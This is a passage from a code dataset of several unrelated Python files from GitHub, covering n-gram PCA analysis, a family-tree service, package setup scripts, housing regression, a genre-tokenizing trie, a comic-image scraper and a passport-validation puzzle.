
)', ' \\\\g<1>', _text)\n # remove paranthesis arounda single word\n _text = re.sub(' \\\\(([^ ])\\\\) ', ' \\\\g<1> ', _text)\n # remove leading and trailing parenthesis\n _text = re.sub(' \\\\(', ' ', _text)\n _text = re.sub('\\\\) ', ' ', _text)\n _text_list = _text.split(' ')\n\n # create the n-grams\n _done = False\n # gram_dict = {}\n for _i in range(len(_text_list)):\n _gram = ''\n _skip = False\n for _j in range(_n):\n if _i + _j >= len(_text_list):\n _done = True\n break\n # check if the current item is punctuation, if so skip this gram\n if _text_list[_i + _j] in ['.', ',', '?', ';', '!', ':', '-']:\n _skip = True\n break\n _gram += _text_list[_i + _j] + ' '\n if not _done and not _skip:\n # remove trailing space\n _gram = _gram[:-1]\n # if gram has already been made\n if _gram in _gram_dict:\n # increment count\n _gram_dict[_gram] += 1\n else:\n # else create new entry\n _gram_dict[_gram] = 1\n _gram_df = pd.DataFrame({'gram': list(_gram_dict.keys()), 'count': list(_gram_dict.values())})\n return _gram_df, _gram_dict\n\n\ndef get_df_of_n_grams(_texts, _n):\n _dic = {}\n _final_df = None\n for _ab in _texts:\n _final_df, _dic = get_n_grams(BeautifulSoup(_ab).get_text(), _n, _dic)\n\n _grams = list(set(_final_df['gram']))\n _article_n_grams = {_x: [] for _x in _grams}\n\n for _ab in _texts:\n _final_df, _dic = get_n_grams(BeautifulSoup(_ab).get_text(), _n,{})\n for _key in _grams:\n if _key in _dic:\n _article_n_grams[_key].append(_dic[_key])\n else:\n _article_n_grams[_key].append(0)\n\n fake_df_n_grams = pd.DataFrame(_article_n_grams)\n return fake_df_n_grams\n\ndf = pd.read_csv('dataset.csv')\n\ndf_copy = df\n\ngrams_2 = get_df_of_n_grams(list(df['abstract']),2)\n\n\n\npca = PCA(n_components=2)\npca.fit(grams_2.to_numpy())\n\nloadings = pd.DataFrame(pca.components_.T, columns=['PC1', 'PC2'], index=list(grams_2.columns))\nsorted_loadings = loadings.sort_values(['PC1', 'PC2'],ascending=False)\n# top 10 most important 2-grams\nprint(sorted_loadings.iloc[:10,:])\nsorted_loadings.iloc[:10,:].to_csv('top-10-pca-term.csv')\n# bottom 10 2-grams\nprint(sorted_loadings.iloc[-10:,:])\nsorted_loadings.iloc[-10:,:].to_csv('bottom-10-pca-term.csv')\n\npca2 = PCA(n_components=2)\npca2.fit(grams_2.to_numpy().transpose())\n\npickle.dump(pca2, open('real_fake_pca.pickle','wb'))\n\nsns.scatterplot(pca2.components_[0,:],pca2.components_[1,:],hue=list(df['type']))\nplt.savefig('real_vs_fake_pca.png')\n\npca = pickle.load(open('real_fake_pca.pickle','rb'))\n\nfakes0 = list(pca.components_[0][:list(df['type']).index('real')])\nfakes1 = list(pca.components_[1][:list(df['type']).index('real')])\n\nreal0 = list(pca.components_[0][list(df['type']).index('real'):])\nreal1 = list(pca.components_[1][list(df['type']).index('real'):])\n\npc_1 = real0 + fakes0\npc_2 = real1 + fakes1\n\nlabels = (['real'] * len(real0)) + (['fake'] * len(fakes0))\n\nsns.scatterplot(pc_1,pc_2,hue=labels)\n","repo_name":"MSBradshaw/BioHackathon2020","sub_path":"real_fake_ngram.py","file_name":"real_fake_ngram.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395515192","text":"import traceback\n\nfrom family_system import constants\nfrom family_system.models.person import Person\nfrom family_system.services.base_service import BaseService\n\n\nclass PersonService(BaseService):\n @classmethod\n def initialize_person(cls, name, sex):\n try:\n person_obj = Person(name, sex)\n return person_obj\n except Exception as e:\n 
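# A compact alternative to the dict-threading in get_n_grams above, using
# collections.Counter to accumulate counts across documents (a sketch; texts
# is assumed to be the list of plain-text abstracts after HTML stripping, and
# the punctuation-padding step is omitted for brevity):
from collections import Counter

def count_ngrams(texts, n):
    counts = Counter()
    for text in texts:
        words = text.split()
        for i in range(len(words) - n + 1):
            counts[' '.join(words[i:i + n])] += 1
    return counts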
print(\"Exception in initializing the king and queen \", name, sex, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def set_generation(cls, person, generation):\n try:\n if person is None:\n print(\"set_generation - Person doesn't exist\")\n return\n if generation < 1:\n print(\"Wrong generation \", generation)\n return\n person.set_generation(generation)\n except Exception as e:\n print(\"Exception in settig the generation for person \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def set_spouse(cls, person , spouse):\n try:\n if person is None or spouse is None:\n print(\"set_spouse - Either person or its spouse is None\", person, spouse)\n return\n if person.spouse is not None:\n print(\"set_spouse - person \", person.name, \"spouse already exists -- \", person.spouse.name)\n return\n if spouse.spouse is not None and spouse.spouse != person:\n print(\"set_spouse - Some other person mentioned as spouse's spouse\", spouse.spouse)\n return\n person.set_spouse(spouse)\n spouse.set_spouse(person)\n except Exception as e:\n print(\"Exception in setting the spouse for \", person, spouse, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def set_is_part_of_shan(cls, person, is_part):\n try:\n if person is None:\n print(\"set_is_part_of_shan - Person doesn't exist\")\n return\n person.set_is_part_of_shan(is_part)\n except Exception as e:\n print(\"Exception in setting is part of shan \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_son(cls, person, son_obj):\n try:\n if person is None:\n print(\"add_son - Person doesn't exist\")\n return\n if son_obj is None or son_obj.sex != constants.MALE:\n print(\"Son is None or not correct\")\n return\n\n person.set_son(son_obj)\n except Exception as e:\n print(\"Exception in adding son \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_daughter(cls, person, daughter_obj):\n try:\n if person is None:\n print(\"add_daughter - Person doesn't exist\")\n return\n if daughter_obj is None or daughter_obj.sex != constants.FEMALE:\n print(\"Daughter is None or not correct\")\n return\n person.set_daughter(daughter_obj)\n except Exception as e:\n print(\"Exception in adding daughter \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_mother(cls, person, mother_obj):\n try:\n if person is None:\n print(\"add_mother - Person doesn't exist\")\n return\n if mother_obj is None or mother_obj.sex != constants.FEMALE:\n print(\"Mother is None or not correct\")\n return\n person.set_mother(mother_obj)\n if person.sex == constants.MALE:\n cls.add_son(mother_obj, )\n except Exception as e:\n print(\"Exception in adding mother \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_father(cls, person, father_obj):\n try:\n if person is None:\n print(\"add_father - Person doesn't exist\")\n return\n if father_obj is None or father_obj.sex != constants.FEMALE:\n print(\"Father is None or not correct\")\n return\n person.set_father(father_obj)\n except Exception as e:\n print(\"Exception in adding father \", person, traceback.print_exc(), e)\n raise e\n","repo_name":"snehilrastogi/low_level_design","sub_path":"geektrust_family_problem/family_system/services/person_service.py","file_name":"person_service.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11098375916","text":"#!/usr/bin/env python\n\n\"\"\"\ndistutils setup (setup.py).\n\nThis is just 
{"seq_id":"11098375916","text":"#!/usr/bin/env python\n\n\"\"\"\ndistutils setup (setup.py).\n\nThis is just boilerplate code, since we like to keep data separate\nfrom code as much as possible. The customizable information really comes\nfrom file __pkginfo__.py.\n\"\"\"\n\nimport os, sys\n\nif not ((2, 4) <= sys.version_info[0:2] < (3, 0)):\n    mess = \"Only Python Versions 2.4 to 2.7 are supported in this package.\"\n    if (3, 2) <= sys.version_info[0:2] < (3, 7):\n        mess += \"\\nFor your Python, version %s, see trepan3k\" % sys.version[0:3]\n    elif sys.version_info[0:2] < (2, 6):\n        mess += \"\\nFor your Python, version %s, see pydbgr\" % sys.version[0:3]\n    raise Exception(mess)\nelif ((2, 4) <= sys.version_info[0:2] < (2, 6)) and not os.path.exists(\n    \"gitbranch-master\"\n):\n    raise Exception(\"You have the wrong code or git branch for Python 2.4, 2.5\")\n\n\n# Get the package information used in setup().\nfrom __pkginfo__ import (\n    author,\n    author_email,\n    classifiers,\n    entry_points,\n    install_requires,\n    license,\n    long_description,\n    modname,\n    packages,\n    py_modules,\n    short_desc,\n    __version__,\n    web,\n    zip_safe,\n)\n\n__import__(\"pkg_resources\")\nfrom setuptools import setup\n\nsetup(\n    author=author,\n    author_email=author_email,\n    classifiers=classifiers,\n    data_files=[\n        (\n            \"trepan/processor/command/help\",\n            [\n                \"trepan/processor/command/help/arange.rst\",\n                \"trepan/processor/command/help/command.rst\",\n                \"trepan/processor/command/help/examples.rst\",\n                \"trepan/processor/command/help/filename.rst\",\n                \"trepan/processor/command/help/location.rst\",\n                \"trepan/processor/command/help/range.rst\",\n                \"trepan/processor/command/help/suffixes.rst\",\n            ],\n        )\n    ],\n    description=short_desc,\n    entry_points=entry_points,\n    install_requires=install_requires,\n    license=license,\n    long_description=long_description,\n    py_modules=py_modules,\n    name=modname,\n    packages=packages,\n    test_suite=\"nose.collector\",\n    url=web,\n    version=__version__,\n    zip_safe=zip_safe,\n)\n","repo_name":"rocky/python2-trepan","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"37"}
{"seq_id":"19985788978","text":"import pandas as pd # Import Pandas for data loading and processing\r\n# Read in the house price data; in the sample code the file address is an internet link, but you can also download the file and read it locally\r\ndf_housing = pd.read_csv(\"E:\\\demo\\\mechineLearning\\\house.csv\") \r\n# Build the feature dataset\r\nX = df_housing.drop(\"median_house_value\", axis = 1)\r\n# Build the label dataset\r\ny = df_housing.median_house_value\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n# Import the linear regression model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel = LinearRegression()\r\n# Train the model\r\nmodel.fit(X_train, y_train)\r\n\r\ny_pred = model.predict(X_test)\r\nprint('Actual house prices', y_test)\r\nprint('Predicted house prices', y_pred)\r\n\r\n# Score the model\r\nprint(\"Model score:\", model.score(X_test, y_test))\r\n\r\nimport matplotlib.pyplot as plt \r\nplt.scatter(X_test.median_income, y_test, color = 'red')\r\nplt.plot(X_test.median_income, y_pred, color = 'blue', linewidth = 1)\r\nplt.xlabel('Median Income')\r\nplt.ylabel('Median House Value')\r\nplt.show()\r\n\r\n","repo_name":"zyk1218/mechineLearning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22841245591","text":"import wordninja\nfrom operator import truediv\n\n\nclass TrieNode(object):\n    \"\"\"\n    Trie Node\n    \"\"\"\n\n    def __init__(self, char):\n        # The 
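# A hedged add-on to the regression example above: alongside the R^2 value
# from model.score, report RMSE in price units, which is easier to interpret
# (report_rmse is an invented helper; mean_squared_error is sklearn's):
import numpy as np
from sklearn.metrics import mean_squared_error

def report_rmse(model, X_test, y_test):
    # Root-mean-squared error between predictions and ground truth.
    rmse = np.sqrt(mean_squared_error(y_test, model.predict(X_test)))
    print("RMSE:", rmse)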
character\n self._char = char\n\n # The children nodes,keys are chars, values are nodes\n self._children = {}\n\n # Marks if the node is the last character of the word\n self._is_word = False\n\n # Keeps track of the actual word\n self._word = None\n\n @property\n def isWord(self):\n return self._is_word\n\n @isWord.setter\n def isWord(self, value):\n self._is_word = value\n\n\nclass Trie(object):\n \"\"\"\n Trie implementation, adjusted for genre representation\n \"\"\"\n\n def __init__(self):\n self._root = TrieNode(\"*\")\n\n\n def tokenize(self, string):\n \"\"\"\n Given a string tokenize it into words that are present in the Trie. If not successful, returns an empty string ''\n \"\"\"\n def _tokenize(index, node=None, acc=[]):\n if node is None:\n node = self._root\n\n if index >= len(string):\n if node.isWord:\n return acc\n else:\n return []\n else:\n char = string[index]\n if char in node._children:\n if node.isWord:\n\n # It will be greedy trying to match the longest word possible\n acc1 = _tokenize(index + 1, node=node._children[char], acc=[char])\n\n if acc1:\n ## if that recursive branch succeeds then return the result\n acc.extend(acc1)\n return acc\n else:\n ## because the above recursion failed be less greedy and take\n ## the next best match path\n acc.append(\" \")\n return _tokenize(index, node=None, acc=acc)\n else:\n acc.append(char)\n return _tokenize(index + 1, node=node._children[char], acc=acc)\n else:\n if node.isWord:\n acc.append(\" \")\n return _tokenize(index, node=None, acc=acc)\n else:\n return []\n\n # Result is a list of chars, with space to delimit each word\n acc = _tokenize(index=0)\n if len(acc) == 0:\n tokens = []\n else:\n tokens = ''.join(acc).split(' ')\n return tokens\n\n\n def _has_prefix(self, prefix, check_has_word):\n \"\"\"\n Check if a prefix exists in the trie\n if check_has_word is True, then it checks whether the word to exist\n \"\"\"\n if prefix is None:\n return False\n\n chars = list(prefix)\n node = self._root\n for char in chars:\n if char not in node._children:\n return False\n node = node._children[char]\n\n if check_has_word:\n return node.isWord\n else:\n return True\n\n def has_prefix(self, prefix):\n \"\"\"\n Check if a prefix exists in the trie\n \"\"\"\n return self._has_prefix(prefix, False)\n\n def has_word(self, prefix):\n \"\"\"\n Check if a word exists in the trie\n \"\"\"\n return self._has_prefix(prefix, True)\n\n\n def _add_word(self, word):\n \"\"\"\n Add a word in the trie\n \"\"\"\n chars = list(word)\n node = self._root\n\n for char in chars:\n if char not in node._children:\n node._children[char] = TrieNode(char)\n node = node._children[char]\n\n node.isWord = True\n node._word = word\n\n def get_words(self, prefix=None):\n \"\"\"\n Return all the words in the trie, having the given prefix\n If prefix is None, it returns all the words\n \"\"\"\n def _get_word_list(node, prefix, result):\n if node.isWord:\n result.append(prefix)\n for char in node._children.keys():\n _get_word_list(node._children[char], prefix + char, result)\n\n if prefix is None:\n return None\n\n result = []\n node = self._root\n chars = list(prefix)\n\n for char in chars:\n if char not in node._children:\n return result\n node = node._children[char]\n _get_word_list(node, prefix, result)\n return result\n\n def get_all_words(self):\n \"\"\"\n Return all the words in the trie\n \"\"\"\n return self.get_words(\"\")\n\n def print_words(self, prefix=\"\"):\n \"\"\"\n Print all words that start with given prefix\n If prefix is \"\", all the words 
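# A quick round-trip with the Trie above (a sketch using only methods
# defined in this class; the seed words are invented):
trie = Trie()
for w in ('rock', 'rockabilly', 'rap'):
    trie._add_word(w)
print(trie.has_prefix('roc'))   # True
print(trie.has_word('roc'))     # False: 'roc' is only a prefix
print(trie.get_words('rock'))   # ['rock', 'rockabilly']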
of the trie are printed\n \"\"\"\n result = self.get_words(prefix)\n for concept in result:\n print(concept)\n\n\n def _mark_known_words(self, words):\n \"\"\"\n Returns a list of tuple,\n each composed of the word and a boolean flag marking if the word is in the trie or not\n \"\"\"\n words_with_in_trie_flags = []\n for word in words:\n if self.has_word(word):\n words_with_in_trie_flags.append((word, True))\n else:\n # try to tokenize instead\n tokens = self.tokenize(word)\n if len(tokens) > 0 and self._acceptable_tokenization(word, tokens):\n for token in tokens:\n words_with_in_trie_flags.append((token, True))\n else:\n words_with_in_trie_flags.append((word, False))\n return words_with_in_trie_flags\n\n def decode_tag(self, word):\n \"\"\"\n Decode a genre in tokens following the same procedure as when the trie was built\n \"\"\"\n tokens = self.tokenize(word)\n wiki_tokens = wordninja.split(word)\n\n if len(tokens) == 1 and len(wiki_tokens) == 1:\n return tokens\n\n marked = self._mark_known_words(wiki_tokens)\n wiki_tokens = [word for word, known in marked]\n\n # if all words are known prioritize the wiki\n for token, known in marked:\n if not known:\n return tokens\n\n if len(tokens) <= len(wiki_tokens):\n return tokens\n\n return wiki_tokens\n\n def _is_short_string(self, string, upper_limit = 3):\n \"\"\"\n Check if a given string is short\n upper_limit specifies the upper bound length of a short string\n \"\"\"\n return len(string) <= upper_limit\n\n def _is_wikipedia_word(self, string):\n \"\"\"\n Check if a given word exists in wikipedia\n \"\"\"\n\n # Use wordninja to split the word\n # It is a probalistic approach to split based on Wikipedia;\n # It works mostly for English words\n words = wordninja.split(string)\n\n # If there is only one returned word, the string itself\n # then it means that the string exists in wikipedia as a word\n return len(words) == 1\n\n def _tokens_in_order_form_word(self, tokens, word):\n \"\"\"\n Check if the given list of tokens form the word through concatenation\n \"\"\"\n return word == ''.join(tokens)\n\n def _are_many_short_tokens(self, tokens, word, average_length = 3.):\n \"\"\"\n Check if word is split in too many short tokens\n average length is set to 3 chars\n \"\"\"\n # Input checks\n if not self._tokens_in_order_form_word(tokens, word):\n raise ValueError(\"The tokens do not appear to be extracted from the given word\", tokens, word)\n\n # Word is split in too many short tokens if there are many tokens with length < average_length\n return len(tokens) > round(len(word)/average_length + .2)\n\n def _count_short_tokens_exceeds_threshold(self, tokens, short_max_length = 2, threshold = 2):\n \"\"\"\n Check if the number of short tokens exceeds a threshold set by default to 2\n A token is short if its lenght is <= short_max_length\n \"\"\"\n return sum([len(token) <= short_max_length for token in tokens]) >= threshold\n\n\n def _has_short_suffix(self, tokens, len_chars = 2):\n \"\"\"\n Check if the last token, the suffix, is 1-char long\n \"\"\"\n return len(tokens) > 1 and len(tokens[-1]) <= len_chars\n\n\n def _known_tokens_single__middle_letters(self, marked_wiki_tokens):\n \"\"\"\n Check if the known tokens are single letters\n \"\"\"\n\n # Ignore if the first letter is a token because often genres have prefixes of 1-letter long\n for token, known in marked_wiki_tokens[1:]:\n if known and len(token) == 1:\n return True\n return False\n\n def _acceptable_tokenization(self, word, tokens):\n \"\"\"\n A tokenization is acceptable if 
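# Worked example of the _are_many_short_tokens bound above: for a
# 12-character word with average_length=3 the cap is round(12/3 + .2) = 4,
# so a split into 5 or more tokens is rejected while 4 is still allowed:
assert round(12 / 3. + .2) == 4
assert not (3 > round(11 / 3. + .2))   # 'rockandroll' -> ['rock', 'and', 'roll'] passes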
multiple rules are met\n not too many short tokens\n the number of short tokens does not exceed a threshold\n the last token is not 1-char long\n \"\"\"\n return not (self._are_many_short_tokens(tokens, word)\n or self._count_short_tokens_exceeds_threshold(tokens)\n or self._has_short_suffix(tokens))\n\n def _get_valid_tokenization_for_start_with_known(self, tokens):\n \"\"\"\n Returns a list of valid tokens for the case when the first token is known\n\n The idea is that unknown tokens after known tokens are not considered as relevant\n and are appended instead to the previous known token\n \"\"\"\n valid_tokens = []\n\n for token, known in tokens:\n if known:\n # If it is known just add it to the list of valid tokens\n valid_tokens.append(token)\n else:\n # If it is unknown append it to the last known token as a suffix\n valid_tokens[-1] += token\n\n return valid_tokens\n\n\n def _get_valid_tokenization_for_start_with_unknown(self, tokens):\n \"\"\"\n Returns a list of valid tokens for the case when the first token is unknown\n\n The idea is that unknown tokens before known tokens are considered as relevant\n and are stored as standalone concepts\n \"\"\"\n valid_tokens = []\n\n # If the last tokens are unknow append them to the last known token as suffix\n last_unknown = ''\n for token, known in tokens:\n if known:\n if last_unknown != '':\n valid_tokens.append(last_unknown)\n last_unknown = ''\n\n valid_tokens.append(token)\n else:\n last_unknown += token\n\n # Check for situations like Unknown+\n if len(valid_tokens) == 0:\n valid_tokens.append(last_unknown)\n # Check for situation like (Uknown+ Known+)+ Unknown+\n elif len(tokens) >= 2 and not tokens[-1][1]:\n valid_tokens[-1] += last_unknown\n\n return valid_tokens\n\n def _get_valid_tokenization(self, tokens):\n \"\"\"\n This function produces a valid tokenization to be added to a trie from\n a list of tokens depending on their belonging to a vocabulary.\n\n Tokens is a list of tuples containing a token and a\n boolean indicating whether the token is part of the vocabulary.\n \"\"\"\n # If the first token is known\n if tokens[0][1]:\n # Apply the first strategy\n return self._get_valid_tokenization_for_start_with_known(tokens)\n\n # If the first token was unknonw the expression is parsed differently\n return self._get_valid_tokenization_for_start_with_unknown(tokens)\n\n def _add_with_wiki_tokenization(self, string):\n \"\"\"\n Helper method for adding a word tokenized with Wordninja\n It returns the concepts that were added\n \"\"\"\n wiki_tokens = wordninja.split(string)\n marked_wiki_tokens = self._mark_known_words(wiki_tokens)\n wiki_tokens = [word for word, known in marked_wiki_tokens]\n unknown_tokens = [token for token, known in marked_wiki_tokens if not known]\n\n if not self._acceptable_tokenization(string, wiki_tokens):\n # If the tokenization was not acceptable add the complete string\n self._add_word(string)\n #print(\"WN_SPLIT_BREAK_HEURISTICS \", string, wiki_tokens)\n\n # And return it as the single token\n return [string]\n\n\n if self._tokens_in_order_form_word(unknown_tokens, string):\n # If all tokens form the word, then add it to the trie\n # It was noticed in experiments that it behaved better this way\n self._add_word(string)\n #print (\"WN_SPLIT_UNKNOWN_WORD \", word, wiki_tokens)\n\n # And return the string as the single token\n return [string]\n\n if self._known_tokens_single__middle_letters(marked_wiki_tokens):\n self._add_word(string)\n return [string]\n\n # The tokenization given by wordninja is checked 
against the trie\n # and some further preprocessing is done to get a valid tokenization\n final_concepts = self._get_valid_tokenization(marked_wiki_tokens)\n\n for concept in final_concepts:\n if not self.has_word(concept):\n self._add_word(concept)\n\n return final_concepts\n\n def _try_add_with_trie_tokenization(self, string):\n \"\"\"\n It adds a string to trie by checking first if it can be tokenized and if the tokenization is acceptable\n Returns None if it was not a successful tokenization or the list of tokens if successful\n \"\"\"\n # First tokenize string by using the trie\n trie_tokens = self.tokenize(string)\n\n # If a tokenization was not possible with the trie\n if len(trie_tokens) == 0:\n return None\n\n # First check if there are short tokens in the result and\n if self._count_short_tokens_exceeds_threshold(trie_tokens, short_max_length = 2, threshold = 1):\n # the word would exists in wikipedia as a standalone word\n if self._is_wikipedia_word(string):\n # If yes, add the word\n self._add_word(string)\n # And return it as the single token\n return [string]\n\n # If the tokenization is acceptable\n if self._acceptable_tokenization(string, trie_tokens):\n # Return the obtained tokens\n return trie_tokens\n\n # the word is really long, give a shot with wikininja\n if len(string) > 15:\n return None\n\n # If the tokenization was not acceptable add the complete word\n self._add_word(string)\n # And return it as the single token\n return [string]\n\n\n\n def add_string_with_tokenization(self, string):\n \"\"\"\n Add a word by first trying its tokenization on the current trie content. This is adjusted to deal with genres written as multiple concatenated words without any space\n\n if the word is tokenized in multiple concepts then a list of concepts is returned, else the word is returned (this is used for adding the edges to the graph)\n \"\"\"\n\n # Safety checks on the input\n if string is None or len(string) == 0:\n return []\n\n # If string is short\n if self._is_short_string(string, upper_limit = 3):\n # Then add string to trie\n self._add_word(string)\n #print(\"WORD FOR SEEDING \", string)\n\n # Return list of tokens containing only the string\n return [string]\n\n # It tries to tokenize a word using the trie and to add it to the trie if the tokenization is not acceptable\n concepts = self._try_add_with_trie_tokenization(string)\n # If the tokenization and adding were successful\n if concepts is not None:\n # Return concepts\n return concepts\n\n # If the previous strategy to add the string by first trying trie tokenizations failed\n # Then split it instead with wordninja\n # https://github.com/keredson/wordninja\n # It is a probalistic approach to split based on Wikipedia words (mainly English)\n return self._add_with_wiki_tokenization(string)\n\n # Levenshtein distance from http://stevehanov.ca/blog/index.php?id=114\n def search(self, word, maxCost):\n \"\"\"\n The search function returns a list of all words that are less than the given\n maximum distance from the target word\n \"\"\"\n\n # Build first row\n currentRow = range(len(word) + 1)\n\n results = []\n\n # Recursively search each branch of the trie\n root = self._root\n for letter in root._children:\n self.search_recursive(root._children[letter], letter, word, currentRow, results, maxCost)\n\n return results\n\n\n def search_recursive(self, node, letter, word, previousRow, results, maxCost):\n \"\"\"\n This recursive helper is used by the search function above. 
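# Hypothetical use of the edit-distance search defined below: seed a few
# genre words and ask for everything within distance 1 of 'pop' (the output
# shown is illustrative; exact ordering depends on trie traversal order):
t = Trie()
for genre in ('pop', 'rock', 'bop', 'pip'):
    t._add_word(genre)
print(t.search('pop', 1))   # e.g. [('pop', 0), ('pip', 1), ('bop', 1)]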
It assumes that\n the previousRow has been filled in already.\n \"\"\"\n columns = len(word) + 1\n currentRow = [previousRow[0] + 1]\n\n # Build one row for the letter, with a column for each letter in the target\n # word, plus one for the empty string at column 0\n for column in range(1, columns):\n insertCost = currentRow[column - 1] + 1\n deleteCost = previousRow[column] + 1\n\n if word[column - 1] != letter:\n replaceCost = previousRow[column - 1] + 1\n else:\n replaceCost = previousRow[column - 1]\n\n currentRow.append(min(insertCost, deleteCost, replaceCost))\n\n # If the last entry in the row indicates the optimal cost is less than the\n # maximum cost, and there is a word in this trie node, then add it.\n if currentRow[-1] <= maxCost and node._word != None:\n results.append((node._word, currentRow[-1]))\n\n # if any entries in the row are less than the maximum cost, then\n # recursively search each branch of the trie\n if min(currentRow) <= maxCost:\n for letter in node._children:\n self.search_recursive(node._children[letter], letter, word, currentRow, results, maxCost)\n\n\n","repo_name":"deezer/MusicGenreTranslation","sub_path":"tag_translation/kb/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":18623,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"611841477","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='surveySimPP',\n version='0.1.0',\n\n packages=setuptools.find_packages(),\n\n\n entry_points={\n 'console_scripts': [\n 'surveySimPP = surveySimPP.surveySimPP:main',\n 'makeConfigOIF=utilities.makeConfigOIF:main',\n 'makeConfigPP=utilities.makeConfigPP:main'\n ],\n },\n\n\n\n author=\"Meg Schwamb\",\n author_email=\"m.schwamb@qub.ac.uk\",\n description=\"The Survey Simulator Post Processing code for the LSST\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dirac-institute/survey_simulator_post_processing\",\n# packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",],\n \n install_requires=['numpy', 'pandas==1.3.5', 'scipy', 'astropy','sbpy @ git+https://github.com/NASA-Planetary-Science/sbpy.git'],\n\n )\n","repo_name":"smmatthews/survey_simulator_post_processing","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"128671654","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport sys\r\nimport re\r\nimport webbrowser\r\n\r\ndef store_imgurl_to_list(comicpage, imgurl_list):\r\n\t'''\r\n\tTake a url as an argument, this function will store the image url link on that page to a list.\r\n\tThe first argument is the url, second argument is the variable name that result will store in.\r\n\t'''\r\n\t#retrieve the javascript into string variable \"target\"\r\n\tr = requests.get(comicpage)\r\n\tsoup = BeautifulSoup(r.content ,'html.parser')\r\n\ttarget = str((soup.find_all('script',{'language':'javascript'})[2]))\r\n\t#get imgurl through regex from \"target\"\r\n\timgurl = re.findall(r'\\\"(.+?)\\\"',target)\r\n\t# imgurl is now ['']\r\n\tdel imgurl[0]\r\n\timgurl = imgurl[0] + 'http://n.kukudm.com/' + imgurl[1]\r\n\timgurl_list.append(imgurl)\r\n\r\n\r\ndef 
write_html(img_list, path):\r\n\t'''\r\n\twrite the list of image urls into the html file at the given path\r\n\t'''\r\n\t#append into html page\r\n\t#produce a clean html file with all the picture\r\n\twith open(path, 'w', encoding='utf-8') as file:\r\n\t    file.write('')\r\n\r\n\twith open(path, 'a', encoding='utf-8') as file:\r\n\t    for imgurl in img_list:\r\n\t        file.write( imgurl +'<br>
')\r\n\r\ndef url_extracting(anyurl):\r\n\t'''\r\n\tGive the first page url of the comic book, this function will return all the page url in a list.\r\n\t'''\r\n\t#retrieve the javascript into string variable \"target\"\r\n\tr = requests.get(anyurl)\r\n\tsoup = BeautifulSoup(r.content ,'html.parser')\r\n\ttarget = str(soup)\r\n\t#get imgurl through regex from \"target\"\r\n\tpage_numbers = int(re.findall(r'\\共(.+?)\\页',target)[0])\r\n\turl_list = []\r\n\tfor i in range(1,page_numbers+1):\r\n\t\turl = anyurl.replace('1.htm', str(i)+'.htm' )\r\n\t\turl_list.append(url)\r\n\treturn (url_list)\r\n\r\n\r\nimgurl_list = []\r\ncomicbook = input('''give me first page url of that comic book: \r\nfor example \\'http://comic.kukudm.com/comiclist/364/5048/1.htm\\'\r\nPlease note that only comics on http://comic.kukudm.com/ will be available\r\nAnd that the process may continue for 2 to 3 minutes \r\n ''') \r\nurl_list = url_extracting(comicbook)\r\nfor url in url_list:\r\n\tstore_imgurl_to_list(url, imgurl_list)\r\nwrite_html(imgurl_list,'pics/pics.html')\r\n\r\nwebbrowser.open('file:///C:/Users/tj371_000/Desktop/venv_parse/src/pics/pics.html')\r\n\r\n","repo_name":"jtanaa/comic-book-scraping","sub_path":"parse_kukudm.py","file_name":"parse_kukudm.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19978480180","text":"#!/usr/bin/env python3\nfrom sys import stdin\nimport re\n\n\ndef checkNum(num, low, high):\n return (int(num) >= low and int(num) <= high) if num.isnumeric() else False\n\n\n# validate params\ndef validate(inf):\n params = [\"byr\", \"iyr\", \"eyr\", \"hgt\", \"hcl\", \"ecl\", \"pid\"]\n\n # existence\n for key in params:\n if key not in inf:\n return False\n\n check = True\n # byr\n # print(inf)\n check = check and checkNum(inf[\"byr\"], 1920, 2002)\n check = check and checkNum(inf[\"iyr\"], 2010, 2020)\n check = check and checkNum(inf[\"eyr\"], 2020, 2030)\n\n hgt = inf[\"hgt\"]\n hsuf = hgt[-2:]\n if not hgt[:-2].isnumeric():\n return False\n\n hnum = int(hgt[:-2])\n\n if hsuf == \"in\":\n check = check and (hnum >= 59 and hnum <= 76)\n elif hsuf == \"cm\":\n check = check and (hnum >= 150 and hnum <= 193)\n else:\n return False\n\n check = check and bool(re.match(\"^#[a-z0-9]{6}$\", inf[\"hcl\"]))\n\n check = check and (\n inf[\"ecl\"] in set([\"amb\", \"blu\", \"brn\", \"gry\", \"grn\", \"hzl\", \"oth\"])\n )\n\n check = check and bool(re.match(\"^[0-9]{9}$\", inf[\"pid\"]))\n\n return check\n\n\ncount = 0\ninfo = {}\nfor line in stdin:\n # reset\n if line == \"\\n\":\n count += 1 if validate(info) else 0\n info = {}\n else:\n for param in line.split(\" 